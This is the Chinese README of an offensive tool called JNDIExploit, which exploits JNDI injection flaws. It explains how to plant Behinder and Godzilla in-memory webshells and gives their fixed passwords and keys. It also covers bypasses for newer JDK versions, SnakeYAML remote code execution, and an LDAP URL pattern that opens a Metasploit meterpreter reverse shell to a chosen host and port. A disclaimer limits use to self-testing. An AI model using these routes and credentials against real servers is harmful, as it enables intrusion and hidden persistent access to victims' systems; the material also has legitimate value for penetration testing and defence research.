JNDIExploit
一款用于 JNDI注入
利用的工具,大量参考/引用了 Rogue JNDI
项目的代码,支持直接植入内存shell
,并集成了常见的bypass 高版本JDK
的方式,适用于与自动化工具配合使用。
对 @feihong-cs 大佬的项目https://github.com/feihong-cs/JNDIExploit 进行了一些改进,tomcatBypass现可直接上线msf。见添加内容2
免责声明
该工具仅用于安全自查检测
由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许,不得善自使用本工具进行任何攻击活动,不得以任何方式将其用于商业目的。
添加内容
添加内容是为了支持SpringBootExploit工具,是定制版的服务端。
- 启动方式:java -jar JNDIExploit-1.3-SNAPSHOT.jar 默认绑定127.0.0.1 LDAP 绑定 1389 HTTP Server 绑定3456
- 根目录下BehinderFilter.class是内存马 /ateam 密码是ateamnb
- data/behinder3.jar 是为了支持SnakYaml RCE
- 添加HTTPServer处理更多的请求,为了更好支持SpringBootExploit工具
- 将文件放在data目录下,通过HTTPServer可以访问文件内容如同python的HTTPServer
添加内容2
新增哥斯拉内存马
- 支持引用类远程加载方式打入(Basic路由)
- 支持本地工厂类方式打入 (TomcatBypass路由)
哥斯拉客户端配置:
密码:pass1024
密钥:key
有效载荷:JavaDynamicPayload
加密器:JAVA_AES_BASE64
修复之前版本中的一些问题,冰蝎内存马现已直接可用冰蝎客户端直连
新增msf上线支持
- 支持tomcatBypass路由直接上线msf:
使用msf的java/meterpreter/reverse_tcp开启监听ldap://127.0.0.1:1389/TomcatBypass/Meterpreter/[msfip]/[msfport]
TODO
- 本地ClassPath反序列化漏洞利用方式
- 支持自定义内存马密码
- 内存马模块改一下
使用说明
使用 java -jar JNDIExploit.jar -h
查看参数说明,其中 --ip
参数为必选参数